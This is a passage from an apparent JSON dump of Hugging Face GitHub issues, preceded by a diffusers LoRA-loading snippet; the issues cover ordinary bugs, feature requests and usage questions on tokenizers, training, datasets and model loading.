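For the local-LoRA question above (huggingface/diffusers#9639), a sketch using the PEFT-backed adapter API: give each LoRA an explicit `adapter_name` and activate both with `set_adapters`, rather than fusing and unloading immediately. Paths are taken from the report; the weights themselves are assumed to be Flux-compatible LoRAs:

```python
import torch
from diffusers import FluxPipeline

pipe = FluxPipeline.from_pretrained(r"D:\downloads\FLUX.1-schnell", torch_dtype=torch.bfloat16)

# name the adapters so it is explicit which LoRAs are active, and at what weight
pipe.load_lora_weights(
    "XLabs-AI/flux-lora-collection", weight_name="disney_lora.safetensors", adapter_name="disney"
)
pipe.load_lora_weights(
    r"D:\AI\stable-diffusion-webui-forge\models\Lora\myflux\myhsr.safetensors", adapter_name="myhsr"
)
pipe.set_adapters(["disney", "myhsr"], adapter_weights=[0.8, 1.0])

# optional: bake the active adapters into the base weights, then drop the LoRA layers
# pipe.fuse_lora()
# pipe.unload_lora_weights()
```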
I would like to add `README.md` there to use the SQL console, for example. But if I describe the structure of this dataset completely, it will overcomplicate the use of Dataset Preview and the total number of columns will exceed 50 \n\n### Your contribution\n\nI'm afraid I'm not familiar with the project structure, so I won't be able to open a PR, but I'll try to help with something else if possible", "url": "https://github.com/huggingface/datasets/issues/7211", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-10-09T16:25:47Z", "updated_at": "2024-10-09T16:25:47Z", "comments": 0, "user": "alozowski" }, { "repo": "huggingface/transformers.js", "number": 965, "title": "Error: cannot release session. invalid session id", "body": "### Question\r\n\r\nI'm trying to get ASR + segmentation to run on a mobile phone (Pixel 6A, 6GB ram). This time on Brave mobile ;-)\r\n\r\nASR alone works fine. But I have a question about also getting the speaker recognition to run (segmentation+verification).\r\n\r\nIn the example implementation a `promiseAll` is used to run both ASR and Segmentation in paralel. For my implementation I've tried to run them one after the other, hoping that this would mean less memory is needed. E.g:\r\n\r\n- Create ASR instance\r\n-- Get text and chunks from audio\r\n- Dispose of ASR instance\r\n\r\n- Create segmentation instance\r\n-- Get segments from audio\r\n- Dispose of segmentation instance\r\n\r\n- Create verification instance\r\n-- Run verification on chunks of audio from each segment\r\n- Dispose of verification instance\r\n\r\nI don't know if it's related, but I noticed the error below:\r\n\r\n\"Screenshot\r\n\r\n\r\n\r\n\r\nMy questions are:\r\n- Is it a valid assumption that doing things consequtively will allow this cascade to run on devices with less memory? Or was there a good reason that a promiseAll was used?\r\n- What does the error mean?\r\n- Is running them consecutively part of why the error occurs?\r\n- Can I use `quantized` with the segmentation and verification models in order to save memory? 
Currently the ASR (tiny-whisper.en_timestamped) is 114MB, and then the segmentation and verification seem to be 512 MB together.\r\n\r\nI haven't split up loading the segmentation and verification instances yet, as I thought I'd get your opinion first.\r\n\r\n```\r\nclass SegmentationSingleton {\r\n \r\n static instance = null;\r\n\t\r\n static segmentation_model_id = 'onnx-community/pyannote-segmentation-3.0';\r\n static segmentation_instance = null;\r\n static segmentation_processor = null;\r\n\tstatic loaded_segmentation = false;\r\n\t\r\n\tstatic verification_model_id = 'Xenova/wavlm-base-plus-sv'; // Xenova/wavlm-base-plus-sv\r\n //static verification_model_id = 'onnx-community/wespeaker-voxceleb-resnet34-LM';\r\n static verification_instance = null;\r\n static verification_processor = null;\r\n\t\r\n\tstatic instance_exists(){\r\n\t\treturn this.segmentation_instance != null;\r\n\t}\r\n\t\r\n\tstatic set_to_null(var_to_null=null){\r\n\t\tif(typeof var_to_null == 'string' && typeof this[var_to_null] != 'undefined'){\r\n\t\t\tthis[var_to_null] = null;\r\n\t\t\t//console.log(\"SegmentationSingleton: set_to_null: \", var_to_null);\r\n\t\t}\r\n\t}\r\n\r\n\r\n //static async getInstance(progress_callback=null,model_name='onnx-community/whisper-base_timestamped',preferences={},load_segmentation=true) {\r\n\tstatic async getInstance(progress_callback=null,preferences={}) {\r\n\t\t//console.log(\"Whisper_worker: SegmentationSingleton: getInstance\");\r\n\t\t\r\n\t\tif(self.is_mobile){\r\n\t\t\tconsole.log(\"mobile, so setting quantized to true for segmentation AI's\");\r\n\t\t\tpreferences['quantized'] = true;\r\n\t\t\t\r\n\t\t}\r\n\t\t\r\n\t\tthis.loaded_segmentation = true\r\n\r\n\t\tconsole.log(\"segmentationSingleton: creating segmentation instances\");\r\n\t\t\r\n this.segmentation_processor ??= AutoProcessor.from_pretrained(this.segmentation_model_id, {\r\n\t\t\t...preferences,\r\n progress_callback,\r\n });\r\n\t\t\r\n this.segmentation_instance ??= AutoModelForAudioFrameClassification.from_pretrained(this.segmentation_model_id, {\r\n // NOTE: WebGPU is not currently supported for this model\r\n // See https://github.com/microsoft/onnxruntime/issues/21386\r\n device: 'wasm',\r\n //dtype: 'fp32',\r\n\t\t\tdtype: 'q8',\r\n\t\t\t...preferences,\r\n progress_callback,\r\n });\r\n\t\r\n\t\tif(this.verification_model_id.endsWith('wespeaker-voxceleb-resnet34-LM')){\r\n\t\t\tself.similarity_threshold = 0.5;\r\n\t\t\tself.perfect_simillarity_threshold = 0.7;\r\n\t\t}\r\n\t\telse{\r\n\t\t\tself.similarity_threshold = 0.95;\r\n\t\t\tself.perfect_simillarity_threshold = 0.98;\r\n\t\t}\r\n\t\r\n this.verification_processor ??= AutoProcessor.from_pretrained(this.verification_model_id, {\r\n device: 'wasm',\r\n dtype: 'fp32',\r\n\t\t\t//device: 'webgpu',\r\n\t\t\t//dtype: 'q8',\r\n\t\t\t...preferences,\r\n progress_callback,\r\n });\r\n\t\r\n this.verification_instance ??= AutoModel.from_pretrained(this.verification_model_id, {\r\n device: 'wasm',\r\n dtype: 'fp32',\r\n\t\t\t//device: 'webgpu',\r\n\t\t\t//dtype: 'q8',\r\n\t\t\t...preferences,\r\n progress_callback,\r\n });\r\n\r\n return Promise.all([this.segmentation_processor, this.segmentation_instance, this.verification_processor, this.verification_instance]);\r\n \r\n }\r\n}\r\n\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/965", "state": "open", "labels": [ "question" ], "created_at": "2024-10-09T13:57:48Z", "updated_at": "2024-10-09T15:51:02Z", "user": "flatsiedatsie" }, { "repo": "huggingface/chat-ui", "number": 1509, 
"title": "(BUG) Oath login splash is BROKEN/does NOT work", "body": "On newer versions of chat-ui the login splash screen does not work. Say for instance you have oauth setup and are not logged in. You should get a popup prompting you to logina nd not see the interface. This used to work without a problem. I just realized this no longer working on the newer versions. I have oauth set up through huggingface working perfectly. \r\n\r\nNote.. even though the splash is not shown someone would be prevented from using the chatbot as it just wont work if your not logged in. However i kinda like the splash.. Anyone know how to get this working again?? already messed with it? save me some time. thank you huggingface for creating this project. Are we going to be getting any of the newer options being implemented into Huggingchat like specifically the continue button and new search/agent control popup panel vs just search on/off?? Thanks and wish yall the best\r\n\r\n***Splash on 0.8.4 (Working)\r\n![image](https://github.com/user-attachments/assets/7ada285f-9ff4-4700-8342-e985d14b2d12)\r\n\r\n***Splash on 0.9.3 (Not Working)\r\n![image](https://github.com/user-attachments/assets/613fab7e-aff5-4225-9b65-ad073fff49a1)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1509", "state": "closed", "labels": [ "bug" ], "created_at": "2024-10-08T18:06:01Z", "updated_at": "2024-11-27T15:02:46Z", "comments": 2, "user": "bpawnzZ" }, { "repo": "huggingface/trl", "number": 2196, "title": "How to exit training when the loss is less than a specified value in SFTTrainer?", "body": "I asked this question in ChatGPT first, it gave the answer below:\r\n```\r\nfrom trl import SFTTrainer\r\nfrom transformers import TrainingArguments\r\nfrom unsloth import is_bfloat16_supported\r\n\r\n# Define customized Trainer class\r\nclass CustomSFTTrainer(SFTTrainer):\r\n def __init__(self, *args, min_loss_threshold=0.001, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n self.min_loss_threshold = min_loss_threshold\r\n\r\n def train(self, *args, **kwargs):\r\n # Rewrite the train() method to monitor the loss.\r\n for step, batch in enumerate(self.get_train_dataloader()):\r\n outputs = self.model(**batch)\r\n loss = outputs.loss\r\n\r\n loss.backward()\r\n self.optimizer.step()\r\n self.lr_scheduler.step()\r\n self.optimizer.zero_grad()\r\n\r\n # If the loss is less than a specified value, exit training.\r\n if loss.item() < self.min_loss_threshold:\r\n print(f\"Stopping training early at step {step} as loss {loss.item()} is below threshold {self.min_loss_threshold}\")\r\n break \r\n\r\n # Print loss log.\r\n if step % self.args.logging_steps == 0:\r\n print(f\"Step {step}, Loss: {loss.item()}\")\r\n\r\n# Initialize the customized Trainer.\r\ntrainer = CustomSFTTrainer(\r\n model=model,\r\n tokenizer=tokenizer,\r\n train_dataset=ds_split['train'],\r\n dataset_text_field=\"text\",\r\n max_seq_length=max_seq_length,\r\n dataset_num_proc=2,\r\n min_loss_threshold=0.001, # Specify the loss threshold\r\n args=TrainingArguments(\r\n per_device_train_batch_size=2,\r\n gradient_accumulation_steps=4,\r\n\r\n warmup_steps=5,\r\n max_steps=200,\r\n\r\n learning_rate=2e-4,\r\n fp16=not is_bfloat16_supported(),\r\n bf16=is_bfloat16_supported(),\r\n logging_steps=1,\r\n optim=\"adamw_8bit\",\r\n weight_decay=0.01,\r\n lr_scheduler_type=\"linear\",\r\n seed=3407,\r\n output_dir=\"outputs\",\r\n ),\r\n)\r\n\r\ntrainer.train()\r\n```\r\nHowever, the code above occurred error as below:\r\n`# Calls into the C++ engine to run the backward 
pass RuntimeError: one of the variables needed for gradient computation has been modified by an inplace operation: [torch.cuda.FloatTensor [2, 482, 3584]], which is output 0 of MulBackward0, is at version 1; expected version 0 instead. Hint: enable anomaly detection to find the operation that failed to compute its gradient, with torch.autograd.set_detect_anomaly(True). `\r\n\r\nI feedbacked the erorr to ChatGPT, it advised to add 2 lines in the code:\r\n```\r\n ...\r\n loss = outputs.loss\r\n\r\n # Avoid inplace-updating\r\n loss = loss.clone()\r\n \r\n loss.backward()\r\n ...\r\n```\r\nI re-ran the code, it occurred errors as below:\r\n```\r\nRuntimeError Traceback (most recent call last)\r\n[](https://localhost:8080/#) in ()\r\n 1 torch.autograd.set_detect_anomaly(True)\r\n----> 2 trainer_stats = trainer.train()\r\n\r\n3 frames\r\n[/usr/local/lib/python3.10/dist-packages/torch/autograd/graph.py](https://localhost:8080/#) in _engine_run_backward(t_outputs, *args, **kwargs)\r\n 767 unregister_hooks = _register_logging_hooks_on_whole_graph(t_outputs)\r\n 768 try:\r\n--> 769 return Variable._execution_engine.run_backward( # Calls into the C++ engine to run the backward pass\r\n 770 t_outputs, *args, **kwargs\r\n 771 ) # Calls into the C++ engine to run the backward pass\r\n\r\nRuntimeError: one of the variables needed for gradient computation has been modified by an inplace operation: [torch.cuda.FloatTensor [2, 256, 3584]], which is output 0 of MulBackward0, is at version 1; expected version 0 instead. Hint: the backtrace further above shows the operation that failed to compute its gradient. The variable in question was changed in there or anywhere later. Good luck!\r\n```\r\n\r\nWhat should I do?", "url": "https://github.com/huggingface/trl/issues/2196", "state": "closed", "labels": [ "\u2753 question", "\ud83c\udfcb SFT" ], "created_at": "2024-10-08T03:13:27Z", "updated_at": "2024-10-08T10:39:51Z", "user": "fishfree" }, { "repo": "huggingface/safetensors", "number": 532, "title": "Documentation about multipart safetensors", "body": "### Feature request\n\nAdd examples to documentation about handling with multipart safetensors files (`*-00001.safetensors`, `*-00002.safetensors`, etc). How to load/save them?\n\n### Motivation\n\nThis is widespread format but README and Docs don't contain enough information about it.\n\n### Your contribution\n\nCan't help by myself", "url": "https://github.com/huggingface/safetensors/issues/532", "state": "closed", "labels": [], "created_at": "2024-10-07T20:14:48Z", "updated_at": "2025-01-03T17:36:31Z", "comments": 6, "user": "attashe" }, { "repo": "huggingface/diffusers", "number": 9599, "title": "Why there is no LoRA only finetune example of FLUX.1?", "body": "**Is your feature request related to a problem? Please describe.**\r\nThe only example of LoRA finetune for FLUX.1 I discovered is here:\r\nhttps://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_flux.py\r\nwhich is a dreambooth example. 
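For the SFTTrainer early-exit question above (huggingface/trl#2196): rewriting `train()` by hand bypasses gradient accumulation, mixed precision, and the care Trainer takes around autograd, which is why the inplace-modification errors appear. A minimal sketch of the supported route, a `TrainerCallback` that flips `should_training_stop`:

```python
from transformers import TrainerCallback


class StopBelowLossCallback(TrainerCallback):
    """Stop training once the logged training loss drops below a threshold."""

    def __init__(self, min_loss_threshold: float = 0.001):
        self.min_loss_threshold = min_loss_threshold

    def on_log(self, args, state, control, logs=None, **kwargs):
        # "loss" appears in the logs every `logging_steps` steps
        if logs and logs.get("loss", float("inf")) < self.min_loss_threshold:
            control.should_training_stop = True
        return control


# usage sketch with the unmodified SFTTrainer:
# trainer = SFTTrainer(model=model, ..., callbacks=[StopBelowLossCallback(0.001)])
```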
The dreambooth is VRAM intensive and not useful for scenario that dataset is big enough and does not need regularization images.\r\n\r\n**Describe the solution you'd like.**\r\nA LoRA only example for FLUX.1\r\n\r\n**Describe alternatives you've considered.**\r\nProvide some tips for me to modify by myself.\r\n", "url": "https://github.com/huggingface/diffusers/issues/9599", "state": "closed", "labels": [], "created_at": "2024-10-07T06:22:54Z", "updated_at": "2024-10-09T12:48:32Z", "comments": 3, "user": "eeyrw" }, { "repo": "huggingface/chat-ui", "number": 1506, "title": "Add support for local models", "body": "## Describe your feature request\r\n\r\nI was looking for an open-source alternative to PocketPal, which allows to converse with local models on iOS and Android https://apps.apple.com/us/app/pocketpal-ai/id6502579498 and I was wondering if HuggingChat could be this alternative? The idea is to have an e2e open-source solution, providing e2e privacy.\r\n\r\nI hope I didn't miss anything in the app allowing to support this.\r\n\r\nThanks\r\n\r\n## Screenshots (if relevant)\r\n\r\n## Implementation idea\r\n\r\nI'm happy to help provided support from the community and the HuggingFace team. I have experience on web development, but not with running LLM on mobile.\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1506", "state": "closed", "labels": [ "enhancement" ], "created_at": "2024-10-06T20:18:24Z", "updated_at": "2024-10-07T13:45:45Z", "comments": 3, "user": "arnaudbreton" }, { "repo": "huggingface/tokenizers", "number": 1644, "title": "How to build a custom tokenizer on top of a exsiting Llama 3.2 tokenizer?", "body": "Hi, \r\nI was trying to create a custom tokenizer for a different language which is not included in llama 3.2 tokenizer. \r\nI could not find exactly what tokenizer I can use from hf which is exact alternative to Llama's tokenizer [link](https://github.com/meta-llama/llama3/blob/main/llama/tokenizer.py), so that I will be able to train a new tokenizer. 
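One hedged alternative to stitching the pipeline together by hand, before the script below: `train_new_from_iterator` retrains only the vocabulary while inheriting the reference tokenizer's normalizer, pre-tokenizer, and post-processor. It assumes access to the gated Llama repo and a `dataset` with a `text` column like the one the script prepares:

```python
from transformers import AutoTokenizer

base = AutoTokenizer.from_pretrained("meta-llama/Llama-3.2-1B")  # gated repo, HF token required


def batch_iterator(dataset, batch_size=1_000):
    for i in range(0, len(dataset), batch_size):
        yield dataset[i : i + batch_size]["text"]


# new BPE merges/vocab, same normalizer/pre-tokenizer/post-processor as Llama 3.2
new_tokenizer = base.train_new_from_iterator(batch_iterator(dataset), vocab_size=64_000)
new_tokenizer.save_pretrained("new-llama-tokenizer")
```

Note that `dataset` is not defined in this sketch; it refers to the concatenated corpus built by `prepare_datasets` in the script that follows.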
\r\n\r\nCurrently I am using following code to train a tokenizer, but final example does not match with the one Llama 3.2 has.\r\n\r\nI would be nice if anyone could share their experience of adapting a Llama model to a new language.\r\n\r\n```\r\nimport json\r\nimport argparse\r\n\r\nfrom datasets import load_dataset, concatenate_datasets\r\nfrom tokenizers import SentencePieceBPETokenizer\r\nfrom transformers import LlamaTokenizerFast, AutoTokenizer\r\n\r\nfrom tqdm import tqdm\r\nfrom typing import List\r\n\r\nhf_datasets = [\"yakhyo/uz-wiki\", \"yakhyo/uz-news\", \"agentlans/high-quality-english-sentences\"]\r\n\r\n\r\n\r\ndef normalize_text(text: str) -> str:\r\n \"\"\"\r\n Normalize Uzbek characters, replacing variations of o\u2018, o', o`, and \u2019 (curved apostrophe).\r\n \"\"\"\r\n return text.replace(\"\u2018\", \"'\").replace(\"`\", \"'\").replace(\"\u2019\", \"'\").replace(\"()\", \"\")\r\n\r\ndef prepare_datasets(datasets_list: List[str]):\r\n all_data = []\r\n for dataset_name in datasets_list:\r\n try:\r\n data = load_dataset(dataset_name)\r\n for split in [\"train\", \"test\", \"validation\"]:\r\n try:\r\n all_data.append(data[split])\r\n except KeyError:\r\n pass\r\n except:\r\n print(f\"dataset: `{dataset_name}` not found, skipping...\")\r\n\r\n concat_data = []\r\n for data in tqdm(all_data):\r\n data = data.map(lambda example: {\"text\": normalize_text(example[\"text\"])})\r\n data = data.remove_columns([col for col in data.column_names if col != \"text\"])\r\n concat_data.append(data)\r\n\r\n return concatenate_datasets(concat_data)\r\n\r\n\r\ndef main(args):\r\n\r\n dataset = prepare_datasets(hf_datasets)\r\n\r\n # select num_samples from the dataset\r\n dataset = dataset.shuffle(seed=42).select(range(len(dataset)))\r\n\r\n # Create a SentencePieceBPETokenizer\r\n tokenizer = SentencePieceBPETokenizer(\r\n replacement=\"\u0120\"\r\n )\r\n\r\n # Train the SentencePieceBPETokenizer on the dataset\r\n tokenizer.train_from_iterator(\r\n iterator=dataset['text'],\r\n vocab_size=args.vocab_size,\r\n show_progress=True,\r\n special_tokens=[\r\n \"\", \r\n \"\",\r\n \"\",\r\n \"\"\r\n ],\r\n )\r\n\r\n # Save the tokenizer\r\n tokenizer.save(\"new-sentencepiece-tokenizer.json\", pretty=True)\r\n\r\n # Load reference tokenizer\r\n if args.reference_tokenizer is not None:\r\n reference_tokenizer = AutoTokenizer.from_pretrained(args.reference_tokenizer)\r\n reference_tokenizer.save_pretrained(\"reference-tokenizer\")\r\n else:\r\n raise ValueError(\r\n \"No tokenizer name provided or no hub token provided. 
Try using --reference_tokenizer 'meta-llama/Llama-2-7b-hf'\")\r\n\r\n # Read and dump the json file for the new tokenizer and the reference tokenizer\r\n with open(\"new-sentencepiece-tokenizer.json\") as f:\r\n new_llama_tokenizer_json = json.load(f)\r\n\r\n with open(\"reference-tokenizer/tokenizer.json\") as f:\r\n reference_tokenizer_json = json.load(f)\r\n\r\n # Add the reference tokenizer's config to the new tokenizer's config\r\n new_llama_tokenizer_json[\"normalizer\"] = reference_tokenizer_json[\"normalizer\"]\r\n new_llama_tokenizer_json[\"pre_tokenizer\"] = reference_tokenizer_json[\"pre_tokenizer\"]\r\n new_llama_tokenizer_json[\"post_processor\"] = reference_tokenizer_json[\"post_processor\"]\r\n new_llama_tokenizer_json[\"decoder\"] = reference_tokenizer_json[\"decoder\"]\r\n new_llama_tokenizer_json[\"model\"]['fuse_unk'] = reference_tokenizer_json[\"model\"]['fuse_unk']\r\n new_llama_tokenizer_json[\"model\"]['byte_fallback'] = reference_tokenizer_json[\"model\"]['byte_fallback']\r\n\r\n # Dump the new tokenizer's config\r\n with open(\"new-sentencepiece-tokenizer.json\", \"w\") as f:\r\n json.dump(new_llama_tokenizer_json, f, indent=2, ensure_ascii=False)\r\n\r\n # Load the new tokenizer as a LlamaTokenizerFast\r\n new_llama_tokenizer = LlamaTokenizerFast(\r\n tokenizer_file=\"new-sentencepiece-tokenizer.json\",\r\n unk_token=\"\",\r\n unk_token_id=0,\r\n bos_token=\"\",\r\n bos_token_id=1,\r\n eos_token=\"\",\r\n eos_token_id=2,\r\n pad_token=\"\",\r\n pad_token_id=3,\r\n padding_side=\"right\",\r\n )\r\n\r\n # Save the new tokenizer\r\n new_llama_tokenizer.save_pretrained(\"new-llama-tokenizer\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description=\"Llama Tokenizer using SentencePieceBPE\")\r\n\r\n parser.add_argument(\r\n \"--reference_tokenizer\",\r\n type=str,\r\n default=None,\r\n help=\"The name of the reference tokenizer to use\"\r\n )\r\n\r\n parser.ad", "url": "https://github.com/huggingface/tokenizers/issues/1644", "state": "closed", "labels": [ "training" ], "created_at": "2024-10-05T13:18:55Z", "updated_at": "2025-02-26T12:06:15Z", "user": "yakhyo" }, { "repo": "huggingface/datasets", "number": 7196, "title": "concatenate_datasets does not preserve shuffling state", "body": "### Describe the bug\r\n\r\nAfter concatenate datasets on an iterable dataset, the shuffling state is destroyed, similar to #7156 \r\n\r\nThis means concatenation cant be used for resolving uneven numbers of samples across devices when using iterable datasets in a distributed setting as discussed in #6623 \r\n\r\nI also noticed that the number of shards is the same after concatenation, which I found surprising, but I don't understand the internals well enough to know whether this is actually surprising or not\r\n\r\n### Steps to reproduce the bug\r\n\r\n```python\r\nimport datasets\r\nimport torch.utils.data\r\n\r\n\r\ndef gen(shards):\r\n yield {\"shards\": shards}\r\n\r\n\r\ndef main():\r\n dataset1 = datasets.IterableDataset.from_generator(\r\n gen, gen_kwargs={\"shards\": list(range(25))} # TODO: how to understand this?\r\n )\r\n dataset2 = datasets.IterableDataset.from_generator(\r\n gen, gen_kwargs={\"shards\": list(range(25, 50))} # TODO: how to understand this?\r\n )\r\n dataset1 = dataset1.shuffle(buffer_size=1)\r\n dataset2 = dataset2.shuffle(buffer_size=1)\r\n print(dataset1.n_shards)\r\n print(dataset2.n_shards)\r\n\r\n dataset = datasets.concatenate_datasets(\r\n [dataset1, dataset2]\r\n )\r\n print(dataset.n_shards)\r\n # dataset = 
dataset1\r\n\r\n dataloader = torch.utils.data.DataLoader(\r\n dataset,\r\n batch_size=8,\r\n num_workers=0,\r\n )\r\n\r\n for i, batch in enumerate(dataloader):\r\n print(batch)\r\n print(\"\\nNew epoch\")\r\n\r\n dataset = dataset.set_epoch(1)\r\n\r\n for i, batch in enumerate(dataloader):\r\n print(batch)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n```\r\n\r\n### Expected behavior\r\n\r\nShuffling state should be preserved\r\n\r\n### Environment info\r\n\r\nLatest datasets", "url": "https://github.com/huggingface/datasets/issues/7196", "state": "open", "labels": [], "created_at": "2024-10-03T14:30:38Z", "updated_at": "2025-03-18T10:56:47Z", "comments": 1, "user": "alex-hh" }, { "repo": "huggingface/diffusers", "number": 9575, "title": "diffusers version update to 0.27.0 from 0.20.0, training code seems not work", "body": "I have trained an inpainting model using diffusers 0.20.0. The trained model works as expected. However, something seems wrong when I update the diffusers version to 0.27.0, while keeping the training code and other requirements the same. The training code runs successfully, but the inference outputs look like noise. Is there any point that should be noticed in this case?", "url": "https://github.com/huggingface/diffusers/issues/9575", "state": "closed", "labels": [], "created_at": "2024-10-03T14:30:21Z", "updated_at": "2024-10-15T08:58:36Z", "comments": 4, "user": "huangjun12" }, { "repo": "huggingface/transformers", "number": 33909, "title": "How to implement weight decay towards the pre-trained model?", "body": "Hello, let me one question.\r\n\r\nIf using HF Trainer for supervised fune-tuning, how do I implement penalizing the distance between starting and current weights? This was shown to be effective in https://arxiv.org/abs/1706.03610", "url": "https://github.com/huggingface/transformers/issues/33909", "state": "open", "labels": [ "Usage", "Feature request" ], "created_at": "2024-10-03T11:18:53Z", "updated_at": "2024-10-22T13:16:26Z", "user": "sedol1339" }, { "repo": "huggingface/datasets", "number": 7189, "title": "Audio preview in dataset viewer for audio array data without a path/filename", "body": "### Feature request\r\n\r\nHuggingface has quite a comprehensive set of guides for [audio datasets](https://huggingface.co/docs/datasets/en/audio_dataset). It seems, however, all these guides assume the audio array data to be decoded/inserted into a HF dataset always originates from individual files. The [Audio-dataclass](https://github.com/huggingface/datasets/blob/3.0.1/src/datasets/features/audio.py#L20) appears designed with this assumption in mind. Looking at its source code it returns a dictionary with the keys `path`, `array` and `sampling_rate`. \r\n\r\nHowever, sometimes users may have different pipelines where they themselves decode the audio array. This feature request has to do with wishing some clarification in guides on whether it is possible, and in such case how users can insert already decoded audio array data into datasets (pandas DataFrame, HF dataset or whatever) that are later saved as parquet, and still get a functioning audio preview in the dataset viewer. \r\n\r\nDo I perhaps need to write a tempfile of my audio array slice to wav and capture the bytes object with `io.BytesIO` and pass that to `Audio()`? \r\n\r\n### Motivation\r\n\r\nI'm working with large audio datasets, and my pipeline reads (decodes) audio from larger files, and slices the relevant portions of audio from that larger file based on metadata I have available. 
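For the decoded-audio question in this report, a sketch of one pattern that avoids per-slice files: declare the column as an `Audio` feature up front and pass already-decoded `{"array", "sampling_rate"}` dicts; `encode_example` then serializes each slice to WAV bytes inside the parquet shards, which is the form the dataset viewer previews. The repo id is hypothetical and `soundfile` must be installed:

```python
import numpy as np
from datasets import Audio, Dataset, Features

# stand-ins for slices your pipeline decodes out of the large source files
slices = [np.zeros(16_000, dtype=np.float32), np.ones(8_000, dtype=np.float32) * 0.1]

features = Features({"audio": Audio(sampling_rate=16_000)})
ds = Dataset.from_dict(
    {"audio": [{"array": a, "sampling_rate": 16_000} for a in slices]},
    features=features,
)
# ds.push_to_hub("user/riksdagen_slices")  # hypothetical target repo
```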
\r\n\r\nThe pipeline is designed this way to avoid having to store multiple copies of data, and to avoid having to store tens of millions of small files. \r\n\r\nI tried [test-uploading parquet files](https://huggingface.co/datasets/Lauler/riksdagen_test) where I store the audio array data of decoded slices of audio in an `audio` column with a dictionary with the keys `path`, `array` and `sampling_rate`. But I don't know the secret sauce of what the Huggingface Hub expects and requires to be able to display audio previews correctly. \r\n\r\n### Your contribution\r\n\r\nI could contribute a tool agnostic guide of creating HF audio datasets directly as parquet to the HF documentation if there is an interest. Provided you help me figure out the secret sauce of what the dataset viewer expects to display the preview correctly.", "url": "https://github.com/huggingface/datasets/issues/7189", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-10-02T16:38:38Z", "updated_at": "2024-10-02T17:01:40Z", "comments": 0, "user": "Lauler" }, { "repo": "huggingface/transformers.js", "number": 958, "title": "Zombies in memory - something is blocking (re)loading of Whisper after a page is closed and re-opened", "body": "### Question\n\nI've been trying to debug this issue all afternoon, but haven't gotten any further. The code runs on desktop, but not on Android Chrome.\r\n\r\nThis is with V3 Alpha 19.\r\n\r\n\"Screenshot\r\n\r\n\"Screenshot\r\n\r\n\"Screenshot\r\n\r\n\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/958", "state": "closed", "labels": [ "question" ], "created_at": "2024-10-02T14:10:27Z", "updated_at": "2024-10-18T12:47:17Z", "user": "flatsiedatsie" }, { "repo": "huggingface/diffusers", "number": 9567, "title": "[community] Improving docstrings and type hints", "body": "There are many instances in the codebase where our docstring/typing convention is not followed. 
We'd like to work on improving this with your help!\r\n\r\nOur convention looks like:\r\n\r\n```python3\r\ndef function_name(parameter_1: Union[str, List[str]], parameter_2: Optional[int] = None, parameter_3: float = 42.0) -> Civilization:\r\n r\"\"\"\r\n Function that creates a simulation.\r\n\r\n Args:\r\n parameter_1 (`str` or `List[str]`):\r\n Description of game level.\r\n parameter_2 (`int`, *optional*):\r\n Kardashev scale of civilization.\r\n parameter_3 (`float`, defaults to `42.0`):\r\n Difficulty scale.\r\n\r\n Returns:\r\n [`~simulations.objects.Civilization`]\r\n A civilization simulation with provided initialization parameters.\r\n \"\"\"\r\n```\r\n\r\nSome examples that don't follow the docstring convention are:\r\n- [this](https://github.com/huggingface/diffusers/blob/c4a8979f3018fbffee33304c1940561f7a5cf613/src/diffusers/models/embeddings.py#L89): missing explanations\r\n- [this](https://github.com/huggingface/diffusers/blob/33fafe3d143ca8380a9e405e7acfa69091d863fb/src/diffusers/pipelines/stable_diffusion_3/pipeline_stable_diffusion_3.py#L132): does not contain mixin-related documentation whereas as [this](https://github.com/huggingface/diffusers/blob/33fafe3d143ca8380a9e405e7acfa69091d863fb/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion.py#L154) does\r\n- [this](https://github.com/huggingface/diffusers/blob/c4a8979f3018fbffee33304c1940561f7a5cf613/src/diffusers/utils/import_utils.py#L672): function explanation after \"Args\", but should be before\r\n- [this](https://github.com/huggingface/diffusers/blob/c4a8979f3018fbffee33304c1940561f7a5cf613/src/diffusers/pipelines/deepfloyd_if/pipeline_output.py#L14): same reason as above\r\n- [this](https://github.com/huggingface/diffusers/blob/c4a8979f3018fbffee33304c1940561f7a5cf613/src/diffusers/models/embeddings.py#L518): incorrect indentation\r\n\r\nThere are also many places where docstrings are completely missing or inadequately explained. If you feel something needs an improvement, you can open a PR with your suggestions too! Additionally, type hints are not appropriate/correctly used at many occurrences and mismatch the accompanying docstrings - these could use an improvement too!\r\n\r\nPlease limit your PRs to changes to a single file in each PR. Changes must be only related to docstrings/type hints. Feel free to ping either @yiyixuxu, @stevhliu or me for reviews.", "url": "https://github.com/huggingface/diffusers/issues/9567", "state": "closed", "labels": [ "documentation", "good first issue", "contributions-welcome" ], "created_at": "2024-10-02T03:20:44Z", "updated_at": "2025-11-13T22:45:59Z", "comments": 16, "user": "a-r-r-o-w" }, { "repo": "huggingface/datasets", "number": 7186, "title": "pinning `dill<0.3.9` without pinning `multiprocess` ", "body": "### Describe the bug\n\nThe [latest `multiprocess` release](https://github.com/uqfoundation/multiprocess/releases/tag/0.70.17) requires `dill>=0.3.9` which causes issues when installing `datasets` without backtracking during package version resolution. 
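As a downstream workaround sketch while no such pin exists, the resolver can be constrained explicitly, e.g. in a requirements file (version bounds as discussed in this report):

```
datasets
multiprocess<0.70.17  # 0.70.17 is the release that requires dill>=0.3.9
dill<0.3.9
```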
